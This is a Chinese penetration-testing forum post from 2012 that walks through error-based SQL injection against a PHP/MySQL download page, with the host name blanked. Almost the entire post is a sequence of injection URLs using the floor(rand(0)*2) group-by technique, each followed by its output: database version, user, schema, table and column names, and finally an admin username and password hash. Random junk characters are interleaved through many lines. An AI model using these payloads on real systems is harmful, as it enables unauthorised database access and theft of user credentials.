找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php+mysql高级爆错注入经测算有效
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1816|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
; D6 [3 f. E- r9 B, {
  p! k. D4 |& G% a之前想找个测试 没想到这有 可以测试下做个记录而已 / {) q8 Y& d% U2 _

, l" z# P. T- I( o" h) p" rhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
$ v1 k, @0 b6 E; Q( c7 r6 `% y
7 f. p, V3 f  @: W+ A/data0/htdocs/leqi_new/app/myapp.php
# ~: Z8 B: y) n) O6 j+ s# W  ?$ S; |" X& \6 L1 v
或者& r6 q5 X! h0 t1 v9 s" I
- j1 ~' w; r: @7 q8 N# T
/**********version()**********/ 5.1.49-log+ a3 r+ u! v+ `* g6 c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003' b$ g4 s% n8 Q5 L0 ?0 o6 z, D
: Z2 j5 u5 {9 `
/**********user()**********/  ) j2 _( P4 Z3 }) O' a8 G
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003! L9 ?6 I% @/ H: i7 I$ @; b* G8 y
+ f! {5 o& ?5 w3 V: {
/**********database()**********/  leqi" |3 ?' Y  }" i$ w$ p+ F0 G
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0036 j5 T" z) p' [: q* s, H
) Z- c2 ]2 z4 E9 O2 q, A
/**********limit依次递归爆库**********// y& x# P) q7 r( `3 h; b; ?9 s+ \
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 ]5 L7 f: w, |4 Y) r
information_schema8 ^9 H4 i; G2 P
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
" l* n3 R* P1 `0 Eleqi4 I" L, R! P0 n" d: l+ B
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) I9 |! Q5 }1 W; B  Gtest
/ R" V' J: ~& k; g% i" t3 e3 `% X) x, i
/**********limit依次递归爆表名**********/% C" Y5 F! G6 s$ ^4 @0 s
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) v" S: {/ r) ]  R% d$ K7 |
users5 j& K' f: |2 I# F! n$ N
. d1 q! `# s. r! @, @, [) \$ V2 g
/**********limit依次递归爆字段名**********/" \) m3 j8 M2 i; {7 \4 N' T- A& g
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003; r, u1 b. o! q) `& S$ i
user_id,username,nickname,passwd,group_id+ g) Q! Y$ h& V& a
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' z2 V: D( K7 \2 t/wapc/5000_0005_003
. ]. u3 k# ^+ R6 v* ]# ?11 21, Z* m' a( m( A- k/ `5 w) s
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%234 N5 D: ?" u6 t8 J+ r0 w& z/ l/ B
/wapc/5000_0005_003. E/ {, \% Y8 M& S
11 341 351 361. U, H2 O- @8 T: W4 w
/**********爆数据**********/. d; q3 }' _9 |# A( ?. B! ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
! `3 y6 h+ H0 ~% }admin
7 H. ?8 r3 \# xhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23% B* z/ X9 D2 w6 A! `- b6 m
6a8b4574ca231eb8bd52764d4978ffcd
. q# k% d1 P9 j; n/ j. b. W
4 V' }9 f7 e- \/ E) ^- L' |
& F7 z. t* a3 J' ^/ J* O
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表